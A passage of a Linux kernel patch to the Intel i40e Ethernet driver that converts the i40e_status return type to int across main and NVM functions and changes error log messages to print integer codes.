+ 	/* Commit temporary BW setting to permanent NVM image */
+ 	enum i40e_admin_queue_err last_aq_status;
+-	i40e_status ret;
+ 	u16 nvm_word;
++	int ret;
+ 
+ 	if (pf->hw.partition_id != 1) {
+ 		dev_info(&pf->pdev->dev,
+@@ -12575,8 +12574,8 @@ i40e_status i40e_commit_partition_bw_setting(struct i40e_pf *pf)
+ 	last_aq_status = pf->hw.aq.asq_last_status;
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Cannot acquire NVM for read access, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "Cannot acquire NVM for read access, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, last_aq_status));
+ 		goto bw_commit_out;
+ 	}
+@@ -12592,8 +12591,8 @@ i40e_status i40e_commit_partition_bw_setting(struct i40e_pf *pf)
+ 	last_aq_status = pf->hw.aq.asq_last_status;
+ 	i40e_release_nvm(&pf->hw);
+ 	if (ret) {
+-		dev_info(&pf->pdev->dev, "NVM read error, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++		dev_info(&pf->pdev->dev, "NVM read error, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, last_aq_status));
+ 		goto bw_commit_out;
+ 	}
+@@ -12606,8 +12605,8 @@ i40e_status i40e_commit_partition_bw_setting(struct i40e_pf *pf)
+ 	last_aq_status = pf->hw.aq.asq_last_status;
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Cannot acquire NVM for write access, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "Cannot acquire NVM for write access, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, last_aq_status));
+ 		goto bw_commit_out;
+ 	}
+@@ -12626,8 +12625,8 @@ i40e_status i40e_commit_partition_bw_setting(struct i40e_pf *pf)
+ 	i40e_release_nvm(&pf->hw);
+ 	if (ret)
+ 		dev_info(&pf->pdev->dev,
+-			 "BW settings NOT SAVED, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "BW settings NOT SAVED, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, last_aq_status));
+ bw_commit_out:
+ 
+@@ -12648,7 +12647,7 @@ static bool i40e_is_total_port_shutdown_enabled(struct i40e_pf *pf)
+ #define I40E_LINK_BEHAVIOR_WORD_LENGTH		0x1
+ #define I40E_LINK_BEHAVIOR_OS_FORCED_ENABLED	BIT(0)
+ #define I40E_LINK_BEHAVIOR_PORT_BIT_LENGTH	4
+-	i40e_status read_status = I40E_SUCCESS;
++	int read_status = I40E_SUCCESS;
+ 	u16 sr_emp_sr_settings_ptr = 0;
+ 	u16 features_enable = 0;
+ 	u16 link_behavior = 0;
+@@ -12681,8 +12680,8 @@ static bool i40e_is_total_port_shutdown_enabled(struct i40e_pf *pf)
+ 
+ err_nvm:
+ 	dev_warn(&pf->pdev->dev,
+-		 "total-port-shutdown feature is off due to read nvm error: %s\n",
+-		 i40e_stat_str(&pf->hw, read_status));
++		 "total-port-shutdown feature is off due to read nvm error: %d\n",
++		 read_status);
+ 	return ret;
+ }
+ 
+@@ -13001,7 +13000,7 @@ static int i40e_udp_tunnel_set_port(struct net_device *netdev,
+ 	struct i40e_netdev_priv *np = netdev_priv(netdev);
+ 	struct i40e_hw *hw = &np->vsi->back->hw;
+ 	u8 type, filter_index;
+-	i40e_status ret;
++	int ret;
+ 
+ 	type = ti->type == UDP_TUNNEL_TYPE_VXLAN ? I40E_AQC_TUNNEL_TYPE_VXLAN :
+ 						   I40E_AQC_TUNNEL_TYPE_NGE;
+@@ -13009,8 +13008,8 @@ static int i40e_udp_tunnel_set_port(struct net_device *netdev,
+ 	ret = i40e_aq_add_udp_tunnel(hw, ntohs(ti->port), type, &filter_index,
+ 				     NULL);
+ 	if (ret) {
+-		netdev_info(netdev, "add UDP port failed, err %s aq_err %s\n",
+-			    i40e_stat_str(hw, ret),
++		netdev_info(netdev, "add UDP port failed, err %d aq_err %s\n",
++			    ret,
+ 			    i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		return -EIO;
+ 	}
+@@ -13025,12 +13024,12 @@ static int i40e_udp_tunnel_unset_port(struct net_device *netdev,
+ {
+ 	struct i40e_netdev_priv *np = netdev_priv(netdev);
+ 	struct i40e_hw *hw = &np->vsi->back->hw;
+-	i40e_status ret;
++	int ret;
+ 
+ 	ret = i40e_aq_del_udp_tunnel(hw, ti->hw_priv, NULL);
+ 	if (ret) {
+-		netdev_info(netdev, "delete UDP port failed, err %s aq_err %s\n",
+-			    i40e_stat_str(hw, ret),
++		netdev_info(netdev, "delete UDP port failed, err %d aq_err %s\n",
++			    ret,
+ 			    i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		return -EIO;
+ 	}
+@@ -13919,8 +13918,8 @@ static int i40e_add_vsi(struct i40e_vsi *vsi)
+ 		ctxt.flags = I40E_AQ_VSI_TYPE_PF;
+ 		if (ret) {
+ 			dev_info(&pf->pdev->dev,
+-				 "couldn't get PF vsi config, err %s aq_err %s\n",
+-				 i40e_stat_str(&pf->hw, ret),
++				 "couldn't get PF vsi config, err %d aq_err %s\n",
++				 ret,
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 			return -ENOENT;
+@@ -13949,8 +13948,8 @@ static int i40e_add_vsi(struct i40e_vsi *vsi)
+ 			ret = i40e_aq_update_vsi_params(hw, &ctxt, NULL);
+ 			if (ret) {
+ 				dev_info(&pf->pdev->dev,
+-					 "update vsi failed, err %s aq_err %s\n",
+-					 i40e_stat_str(&pf->hw, ret),
++					 "update vsi failed, err %d aq_err %s\n",
++					 ret,
+ 					 i40e_aq_str(&pf->hw,
+ 						     pf->hw.aq.asq_last_status));
+ 				ret = -ENOENT;
+@@ -13969,8 +13968,8 @@ static int i40e_add_vsi(struct i40e_vsi *vsi)
+ 			ret = i40e_aq_update_vsi_params(hw, &ctxt, NULL);
+ 			if (ret) {
+ 				dev_info(&pf->pdev->dev,
+-					 "update vsi failed, err %s aq_err %s\n",
+-					 i40e_stat_str(&pf->hw, ret),
++					 "update vsi failed, err %d aq_err %s\n",
++					 ret,
+ 					 i40e_aq_str(&pf->hw,
+ 						    pf->hw.aq.asq_last_status));
+ 				ret = -ENOENT;
+@@ -13992,9 +13991,9 @@ static int i40e_add_vsi(struct i40e_vsi *vsi)
+ 				 * message and continue
+ 				 */
+ 				dev_info(&pf->pdev->dev,
+-					 "failed to configure TCs for main VSI tc_map 0x%08x, err %s aq_err %s\n",
++					 "failed to configure TCs for main VSI tc_map 0x%08x, err %d aq_err %s\n",
+ 					 enabled_tc,
+-					 i40e_stat_str(&pf->hw, ret),
++					 ret,
+ 					 i40e_aq_str(&pf->hw,
+ 						    pf->hw.aq.asq_last_status));
+ 			}
+@@ -14088,8 +14087,8 @@ static int i40e_add_vsi(struct i40e_vsi *vsi)
+ 		ret = i40e_aq_add_vsi(hw, &ctxt, NULL);
+ 		if (ret) {
+ 			dev_info(&vsi->back->pdev->dev,
+-				 "add vsi failed, err %s aq_err %s\n",
+-				 i40e_stat_str(&pf->hw, ret),
++				 "add vsi failed, err %d aq_err %s\n",
++				 ret,
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 			ret = -ENOENT;
+@@ -14120,8 +14119,8 @@ static int i40e_add_vsi(struct i40e_vsi *vsi)
+ 	ret = i40e_vsi_get_bw_info(vsi);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "couldn't get vsi bw info, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "couldn't get vsi bw info, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		/* VSI is already added so not tearing that up */
+ 		ret = 0;
+@@ -14567,8 +14566,8 @@ static int i40e_veb_get_bw_info(struct i40e_veb *veb)
+ 						  &bw_data, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "query veb bw config failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "query veb bw config failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, hw->aq.asq_last_status));
+ 		goto out;
+ 	}
+@@ -14577,8 +14576,8 @@ static int i40e_veb_get_bw_info(struct i40e_veb *veb)
+ 						   &ets_data, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "query veb bw ets config failed, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "query veb bw ets config failed, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, hw->aq.asq_last_status));
+ 		goto out;
+ 	}
+@@ -14774,8 +14773,8 @@ static int i40e_add_veb(struct i40e_veb *veb, struct i40e_vsi *vsi)
+ 	/* get a VEB from the hardware */
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "couldn't add VEB, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "couldn't add VEB, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return -EPERM;
+ 	}
+@@ -14785,16 +14784,16 @@ static int i40e_add_veb(struct i40e_veb *veb, struct i40e_vsi *vsi)
+ 					 &veb->stats_idx, NULL, NULL, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "couldn't get VEB statistics idx, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "couldn't get VEB statistics idx, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return -EPERM;
+ 	}
+ 	ret = i40e_veb_get_bw_info(veb);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "couldn't get VEB bw info, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "couldn't get VEB bw info, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		i40e_aq_delete_element(&pf->hw, veb->seid, NULL);
+ 		return -ENOENT;
+@@ -15004,8 +15003,8 @@ int i40e_fetch_switch_configuration(struct i40e_pf *pf, bool printconfig)
+ 						&next_seid, NULL);
+ 		if (ret) {
+ 			dev_info(&pf->pdev->dev,
+-				 "get switch config failed err %s aq_err %s\n",
+-				 i40e_stat_str(&pf->hw, ret),
++				 "get switch config failed err %d aq_err %s\n",
++				 ret,
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 			kfree(aq_buf);
+@@ -15050,8 +15049,8 @@ static int i40e_setup_pf_switch(struct i40e_pf *pf, bool reinit, bool lock_acqui
+ 	ret = i40e_fetch_switch_configuration(pf, false);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "couldn't fetch switch config, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "couldn't fetch switch config, err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return ret;
+ 	}
+@@ -15077,8 +15076,8 @@ static int i40e_setup_pf_switch(struct i40e_pf *pf, bool reinit, bool lock_acqui
+ 						NULL);
+ 		if (ret && pf->hw.aq.asq_last_status != I40E_AQ_RC_ESRCH) {
+ 			dev_info(&pf->pdev->dev,
+-				 "couldn't set switch config bits, err %s aq_err %s\n",
+-				 i40e_stat_str(&pf->hw, ret),
++				 "couldn't set switch config bits, err %d aq_err %s\n",
++				 ret,
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 			/* not a fatal problem, just keep going */
+@@ -15415,13 +15414,12 @@ static bool i40e_check_recovery_mode(struct i40e_pf *pf)
+  *
+  * Return 0 on success, negative on failure.
+  **/
+-static i40e_status i40e_pf_loop_reset(struct i40e_pf *pf)
++static int i40e_pf_loop_reset(struct i40e_pf *pf)
+ {
+ 	/* wait max 10 seconds for PF reset to succeed */
+ 	const unsigned long time_end = jiffies + 10 * HZ;
+-
+ 	struct i40e_hw *hw = &pf->hw;
+-	i40e_status ret;
++	int ret;
+ 
+ 	ret = i40e_pf_reset(hw);
+ 	while (ret != I40E_SUCCESS && time_before(jiffies, time_end)) {
+@@ -15467,9 +15465,9 @@ static bool i40e_check_fw_empr(struct i40e_pf *pf)
+  * Return 0 if NIC is healthy or negative value when there are issues
+  * with resets
+  **/
+-static i40e_status i40e_handle_resets(struct i40e_pf *pf)
++static int i40e_handle_resets(struct i40e_pf *pf)
+ {
+-	const i40e_status pfr = i40e_pf_loop_reset(pf);
++	const int pfr = i40e_pf_loop_reset(pf);
+ 	const bool is_empr = i40e_check_fw_empr(pf);
+ 
+ 	if (is_empr || pfr != I40E_SUCCESS)
+@@ -15608,13 +15606,15 @@ static int i40e_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	struct i40e_aq_get_phy_abilities_resp abilities;
+ #ifdef CONFIG_I40E_DCB
+ 	enum i40e_get_fw_lldp_status_resp lldp_status;
+-	i40e_status status;
+ #endif /* CONFIG_I40E_DCB */
+ 	struct i40e_pf *pf;
+ 	struct i40e_hw *hw;
+ 	static u16 pfs_found;
+ 	u16 wol_nvm_bits;
+ 	u16 link_status;
++#ifdef CONFIG_I40E_DCB
++	int status;
++#endif /* CONFIG_I40E_DCB */
+ 	int err;
+ 	u32 val;
+ 	u32 i;
+@@ -15983,8 +15983,8 @@ static int i40e_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 					 I40E_AQ_EVENT_MEDIA_NA |
+ 					 I40E_AQ_EVENT_MODULE_QUAL_FAIL), NULL);
+ 	if (err)
+-		dev_info(&pf->pdev->dev, "set phy mask fail, err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, err),
++		dev_info(&pf->pdev->dev, "set phy mask fail, err %d aq_err %s\n",
++			 err,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 
+ 	/* Reconfigure hardware for allowing smaller MSS in the case
+@@ -16002,8 +16002,8 @@ static int i40e_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 		msleep(75);
+ 		err = i40e_aq_set_link_restart_an(&pf->hw, true, NULL);
+ 		if (err)
+-			dev_info(&pf->pdev->dev, "link restart failed, err %s aq_err %s\n",
+-				 i40e_stat_str(&pf->hw, err),
++			dev_info(&pf->pdev->dev, "link restart failed, err %d aq_err %s\n",
++				 err,
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 	}
+@@ -16135,8 +16135,8 @@ static int i40e_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	/* get the requested speeds from the fw */
+ 	err = i40e_aq_get_phy_capabilities(hw, false, false, &abilities, NULL);
+ 	if (err)
+-		dev_dbg(&pf->pdev->dev, "get requested speeds ret =  %s last_status =  %s\n",
+-			i40e_stat_str(&pf->hw, err),
++		dev_dbg(&pf->pdev->dev, "get requested speeds ret =  %d last_status =  %s\n",
++			err,
+ 			i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 	pf->hw.phy.link_info.requested_speeds = abilities.link_speed;
+ 
+@@ -16146,8 +16146,8 @@ static int i40e_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	/* get the supported phy types from the fw */
+ 	err = i40e_aq_get_phy_capabilities(hw, false, true, &abilities, NULL);
+ 	if (err)
+-		dev_dbg(&pf->pdev->dev, "get supported phy types ret =  %s last_status =  %s\n",
+-			i40e_stat_str(&pf->hw, err),
++		dev_dbg(&pf->pdev->dev, "get supported phy types ret =  %d last_status =  %s\n",
++			err,
+ 			i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 
+ 	/* make sure the MFS hasn't been set lower than the default */
+@@ -16218,7 +16218,7 @@ static void i40e_remove(struct pci_dev *pdev)
+ {
+ 	struct i40e_pf *pf = pci_get_drvdata(pdev);
+ 	struct i40e_hw *hw = &pf->hw;
+-	i40e_status ret_code;
++	int ret_code;
+ 	int i;
+ 
+ 	i40e_dbg_pf_exit(pf);
+@@ -16466,9 +16466,9 @@ static void i40e_pci_error_resume(struct pci_dev *pdev)
+ static void i40e_enable_mc_magic_wake(struct i40e_pf *pf)
+ {
+ 	struct i40e_hw *hw = &pf->hw;
+-	i40e_status ret;
+ 	u8 mac_addr[6];
+ 	u16 flags = 0;
++	int ret;
+ 
+ 	/* Get current MAC address in case it's an LAA */
+ 	if (pf->vsi[pf->lan_vsi] && pf->vsi[pf->lan_vsi]->netdev) {
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_nvm.c b/drivers/net/ethernet/intel/i40e/i40e_nvm.c
+index 3a38bf8bcde7e..17e3f26eee4a4 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_nvm.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_nvm.c
+@@ -13,10 +13,10 @@
+  * in this file) as an equivalent of the FLASH part mapped into the SR.
+  * We are accessing FLASH always thru the Shadow RAM.
+  **/
+-i40e_status i40e_init_nvm(struct i40e_hw *hw)
++int i40e_init_nvm(struct i40e_hw *hw)
+ {
+ 	struct i40e_nvm_info *nvm = &hw->nvm;
+-	i40e_status ret_code = 0;
++	int ret_code = 0;
+ 	u32 fla, gens;
+ 	u8 sr_size;
+ 
+@@ -52,12 +52,12 @@ i40e_status i40e_init_nvm(struct i40e_hw *hw)
+  * This function will request NVM ownership for reading
+  * via the proper Admin Command.
+  **/
+-i40e_status i40e_acquire_nvm(struct i40e_hw *hw,
+-				       enum i40e_aq_resource_access_type access)
++int i40e_acquire_nvm(struct i40e_hw *hw,
++		     enum i40e_aq_resource_access_type access)
+ {
+-	i40e_status ret_code = 0;
+ 	u64 gtime, timeout;
+ 	u64 time_left = 0;
++	int ret_code = 0;
+ 
+ 	if (hw->nvm.blank_nvm_mode)
+ 		goto i40e_i40e_acquire_nvm_exit;
+@@ -111,7 +111,7 @@ i40e_i40e_acquire_nvm_exit:
+  **/
+ void i40e_release_nvm(struct i40e_hw *hw)
+ {
+-	i40e_status ret_code = I40E_SUCCESS;
++	int ret_code = I40E_SUCCESS;
+ 	u32 total_delay = 0;
+ 
+ 	if (hw->nvm.blank_nvm_mode)
+@@ -138,9 +138,9 @@ void i40e_release_nvm(struct i40e_hw *hw)
+  *
+  * Polls the SRCTL Shadow RAM register done bit.
+  **/
+-static i40e_status i40e_poll_sr_srctl_done_bit(struct i40e_hw *hw)
++static int i40e_poll_sr_srctl_done_bit(struct i40e_hw *hw)
+ {
+-	i40e_status ret_code = I40E_ERR_TIMEOUT;
++	int ret_code = I40E_ERR_TIMEOUT;
+ 	u32 srctl, wait_cnt;
+ 
+ 	/* Poll the I40E_GLNVM_SRCTL until the done bit is set */
+@@ -165,10 +165,10 @@ static i40e_status i40e_poll_sr_srctl_done_bit(struct i40e_hw *hw)
+  *
+  * Reads one 16 bit word from the Shadow RAM using the GLNVM_SRCTL register.
+  **/
+-static i40e_status i40e_read_nvm_word_srctl(struct i40e_hw *hw, u16 offset,
+-					    u16 *data)
++static int i40e_read_nvm_word_srctl(struct i40e_hw *hw, u16 offset,
++				    u16 *data)
+ {
+-	i40e_status ret_code = I40E_ERR_TIMEOUT;
++	int ret_code = I40E_ERR_TIMEOUT;
+ 	u32 sr_reg;
+ 
+ 	if (offset >= hw->nvm.sr_size) {
+@@ -216,13 +216,13 @@ read_nvm_exit:
+  *
+  * Writes a 16 bit words buffer to the Shadow RAM using the admin command.
+  **/
+-static i40e_status i40e_read_nvm_aq(struct i40e_hw *hw,
+-				    u8 module_pointer, u32 offset,
+-				    u16 words, void *data,
+-				    bool last_command)
++static int i40e_read_nvm_aq(struct i40e_hw *hw,
++			    u8 module_pointer, u32 offset,
++			    u16 words, void *data,
++			    bool last_command)
+ {
+-	i40e_status ret_code = I40E_ERR_NVM;
+ 	struct i40e_asq_cmd_details cmd_details;
++	int ret_code = I40E_ERR_NVM;
+ 
+ 	memset(&cmd_details, 0, sizeof(cmd_details));
+ 	cmd_details.wb_desc = &hw->nvm_wb_desc;
+@@ -264,10 +264,10 @@ static i40e_status i40e_read_nvm_aq(struct i40e_hw *hw,
+  *
+  * Reads one 16 bit word from the Shadow RAM using the AdminQ
+  **/
+-static i40e_status i40e_read_nvm_word_aq(struct i40e_hw *hw, u16 offset,
+-					 u16 *data)
++static int i40e_read_nvm_word_aq(struct i40e_hw *hw, u16 offset,
++				 u16 *data)
+ {
+-	i40e_status ret_code = I40E_ERR_TIMEOUT;
++	int ret_code = I40E_ERR_TIMEOUT;
+ 
+ 	ret_code = i40e_read_nvm_aq(hw, 0x0, offset, 1, data, true);
+ 	*data = le16_to_cpu(*(__le16 *)data);
+@@ -286,8 +286,8 @@ static i40e_status i40e_read_nvm_word_aq(struct i40e_hw *hw, u16 offset,
+  * Do not use this function except in cases where the nvm lock is already
+  * taken via i40e_acquire_nvm().
+  **/
+-static i40e_status __i40e_read_nvm_word(struct i40e_hw *hw,
+-					u16 offset, u16 *data)
++static int __i40e_read_nvm_word(struct i40e_hw *hw,
++				u16 offset, u16 *data)
+ {
+ 	if (hw->flags & I40E_HW_FLAG_AQ_SRCTL_ACCESS_ENABLE)
+ 		return i40e_read_nvm_word_aq(hw, offset, data);
+@@ -303,10 +303,10 @@ static i40e_status __i40e_read_nvm_word(struct i40e_hw *hw,
+  *
+  * Reads one 16 bit word from the Shadow RAM.
+  **/
+-i40e_status i40e_read_nvm_word(struct i40e_hw *hw, u16 offset,
+-			       u16 *data)
++int i40e_read_nvm_word(struct i40e_hw *hw, u16 offset,
++		       u16 *data)
+ {
+-	i40e_status ret_code = 0;
++	int ret_code = 0;
+ 
+ 	if (hw->flags & I40E_HW_FLAG_NVM_READ_REQUIRES_LOCK)
+ 		ret_code = i40e_acquire_nvm(hw, I40E_RESOURCE_READ);
+@@ -330,17 +330,17 @@ i40e_status i40e_read_nvm_word(struct i40e_hw *hw, u16 offset,
+  * @words_data_size: Words to read from NVM
+  * @data_ptr: Pointer to memory location where resulting buffer will be stored
+  **/
+-enum i40e_status_code i40e_read_nvm_module_data(struct i40e_hw *hw,
+-						u8 module_ptr,
+-						u16 module_offset,
+-						u16 data_offset,
+-						u16 words_data_size,
+-						u16 *data_ptr)
++int i40e_read_nvm_module_data(struct i40e_hw *hw,
++			      u8 module_ptr,
++			      u16 module_offset,
++			      u16 data_offset,
++			      u16 words_data_size,
++			      u16 *data_ptr)
+ {
+-	i40e_status status;
+ 	u16 specific_ptr = 0;
+ 	u16 ptr_value = 0;
+ 	u32 offset = 0;
++	int status;
+ 
+ 	if (module_ptr != 0) {
+ 		status = i40e_read_nvm_word(hw, module_ptr, &ptr_value);
+@@ -406,10 +406,10 @@ enum i40e_status_code i40e_read_nvm_module_data(struct i40e_hw *hw,
+  * method. The buffer read is preceded by the NVM ownership take
+  * and followed by the release.
+  **/
+-static i40e_status i40e_read_nvm_buffer_srctl(struct i40e_hw *hw, u16 offset,
+-					      u16 *words, u16 *data)
++static int i40e_read_nvm_buffer_srctl(struct i40e_hw *hw, u16 offset,
++				      u16 *words, u16 *data)
+ {
+-	i40e_status ret_code = 0;
++	int ret_code = 0;
+ 	u16 index, word;
+ 
+ 	/* Loop thru the selected region */
+@@ -437,13 +437,13 @@ static i40e_status i40e_read_nvm_buffer_srctl(struct i40e_hw *hw, u16 offset,
+  * method. The buffer read is preceded by the NVM ownership take
+  * and followed by the release.
+  **/
+-static i40e_status i40e_read_nvm_buffer_aq(struct i40e_hw *hw, u16 offset,
+-					   u16 *words, u16 *data)
++static int i40e_read_nvm_buffer_aq(struct i40e_hw *hw, u16 offset,
++				   u16 *words, u16 *data)
+ {
+-	i40e_status ret_code;
+-	u16 read_size;
+ 	bool last_cmd = false;
+ 	u16 words_read = 0;
++	u16 read_size;
++	int ret_code;
+ 	u16 i = 0;
+ 
+ 	do {
+@@ -493,9 +493,9 @@ read_nvm_buffer_aq_exit:
+  * Reads 16 bit words (data buffer) from the SR using the i40e_read_nvm_srrd()
+  * method.
+  **/
+-static i40e_status __i40e_read_nvm_buffer(struct i40e_hw *hw,
+-					  u16 offset, u16 *words,
+-					  u16 *data)
++static int __i40e_read_nvm_buffer(struct i40e_hw *hw,
++				  u16 offset, u16 *words,
++				  u16 *data)
+ {
+ 	if (hw->flags & I40E_HW_FLAG_AQ_SRCTL_ACCESS_ENABLE)
+ 		return i40e_read_nvm_buffer_aq(hw, offset, words, data);
+@@ -514,10 +514,10 @@ static i40e_status __i40e_read_nvm_buffer(struct i40e_hw *hw,
+  * method. The buffer read is preceded by the NVM ownership take
+  * and followed by the release.
+  **/
+-i40e_status i40e_read_nvm_buffer(struct i40e_hw *hw, u16 offset,
+-				 u16 *words, u16 *data)
++int i40e_read_nvm_buffer(struct i40e_hw *hw, u16 offset,
++			 u16 *words, u16 *data)
+ {
+-	i40e_status ret_code = 0;
++	int ret_code = 0;
+ 
+ 	if (hw->flags & I40E_HW_FLAG_AQ_SRCTL_ACCESS_ENABLE) {
+ 		ret_code = i40e_acquire_nvm(hw, I40E_RESOURCE_READ);
+@@ -544,12 +544,12 @@ i40e_status i40e_read_nvm_buffer(struct i40e_hw *hw, u16 offset,
+  *
+  * Writes a 16 bit words buffer to the Shadow RAM using the admin command.
+  **/
+-static i40e_status i40e_write_nvm_aq(struct i40e_hw *hw, u8 module_pointer,
+-				     u32 offset, u16 words, void *data,
+-				     bool last_command)
++static int i40e_write_nvm_aq(struct i40e_hw *hw, u8 module_pointer,
++			     u32 offset, u16 words, void *data,
++			     bool last_command)
+ {
+-	i40e_status ret_code = I40E_ERR_NVM;
+ 	struct i40e_asq_cmd_details cmd_details;
++	int ret_code = I40E_ERR_NVM;
+ 
+ 	memset(&cmd_details, 0, sizeof(cmd_details));
+ 	cmd_details.wb_desc = &hw->nvm_wb_desc;
+@@ -594,14 +594,14 @@ static i40e_status i40e_write_nvm_aq(struct i40e_hw *hw, u8 module_pointer,
+  * is customer specific and unknown. Therefore, this function skips all maximum
+  * possible size of VPD (1kB).
+  **/
+-static i40e_status i40e_calc_nvm_checksum(struct i40e_hw *hw,
+-						    u16 *checksum)
++static int i40e_calc_nvm_checksum(struct i40e_hw *hw,
++				  u16 *checksum)
+ {
+-	i40e_status ret_code;
+ 	struct i40e_virt_mem vmem;
+ 	u16 pcie_alt_module = 0;
+ 	u16 checksum_local = 0;
+ 	u16 vpd_module = 0;
++	int ret_code;
+ 	u16 *data;
+ 	u16 i = 0;
+ 
+@@ -675,11 +675,11 @@ i40e_calc_nvm_checksum_exit:
+  * on ARQ completion event reception by caller.
+  * This function will commit SR to NVM.
+  **/
+-i40e_status i40e_update_nvm_checksum(struct i40e_hw *hw)
++int i40e_update_nvm_checksum(struct i40e_hw *hw)
+ {
+-	i40e_status ret_code;
+-	u16 checksum;
+ 	__le16 le_sum;
++	int ret_code;
++	u16 checksum;
+ 
+ 	ret_code = i40e_calc_nvm_checksum(hw, &checksum);
+ 	if (!ret_code) {
+@@ -699,12 +699,12 @@ i40e_status i40e_update_nvm_checksum(struct i40e_hw *hw)
+  * Performs checksum calculation and validates the NVM SW checksum. If the
+  * caller does not need checksum, the value can be NULL.
+  **/
+-i40e_status i40e_validate_nvm_checksum(struct i40e_hw *hw,
+-						 u16 *checksum)
++int i40e_validate_nvm_checksum(struct i40e_hw *hw,
++			       u16 *checksum)
+ {
+-	i40e_status ret_code = 0;
+-	u16 checksum_sr = 0;
+ 	u16 checksum_local = 0;
++	u16 checksum_sr = 0;
++	int ret_code = 0;
+ 
+ 	/* We must acquire the NVM lock in order to correctly synchronize the
+ 	 * NVM accesses across multiple PFs. Without doing so it is possible
+@@ -733,36 +733,36 @@ i40e_status i40e_validate_nvm_checksum(struct i40e_hw *hw,
+ 	return ret_code;
+ }
+ 
+-static i40e_status i40e_nvmupd_state_init(struct i40e_hw *hw,
+-					  struct i40e_nvm_access *cmd,
+-					  u8 *bytes, int *perrno);
+-static i40e_status i40e_nvmupd_state_reading(struct i40e_hw *hw,
+-					     struct i40e_nvm_access *cmd,
+-					     u8 *bytes, int *perrno);
+-static i40e_status i40e_nvmupd_state_writing(struct i40e_hw *hw,
+-					     struct i40e_nvm_access *cmd,
+-					     u8 *bytes, int *errno);
++static int i40e_nvmupd_state_init(struct i40e_hw *hw,
++				  struct i40e_nvm_access *cmd,
++				  u8 *bytes, int *perrno);
++static int i40e_nvmupd_state_reading(struct i40e_hw *hw,
++				     struct i40e_nvm_access *cmd,
++				     u8 *bytes, int *perrno);
++static int i40e_nvmupd_state_writing(struct i40e_hw *hw,
++				     struct i40e_nvm_access *cmd,
++				     u8 *bytes, int *errno);
+ static enum i40e_nvmupd_cmd i40e_nvmupd_validate_command(struct i40e_hw *hw,
+ 						struct i40e_nvm_access *cmd,
+ 						int *perrno);
+-static i40e_status i40e_nvmupd_nvm_erase(struct i40e_hw *hw,
+-					 struct i40e_nvm_access *cmd,
+-					 int *perrno);
+-static i40e_status i40e_nvmupd_nvm_write(struct i40e_hw *hw,
+-					 struct i40e_nvm_access *cmd,
+-					 u8 *bytes, int *perrno);
+-static i40e_status i40e_nvmupd_nvm_read(struct i40e_hw *hw,
+-					struct i40e_nvm_access *cmd,
+-					u8 *bytes, int *perrno);
+-static i40e_status i40e_nvmupd_exec_aq(struct i40e_hw *hw,
+-				       struct i40e_nvm_access *cmd,
+-				       u8 *bytes, int *perrno);
+-static i40e_status i40e_nvmupd_get_aq_result(struct i40e_hw *hw,
+-					     struct i40e_nvm_access *cmd,
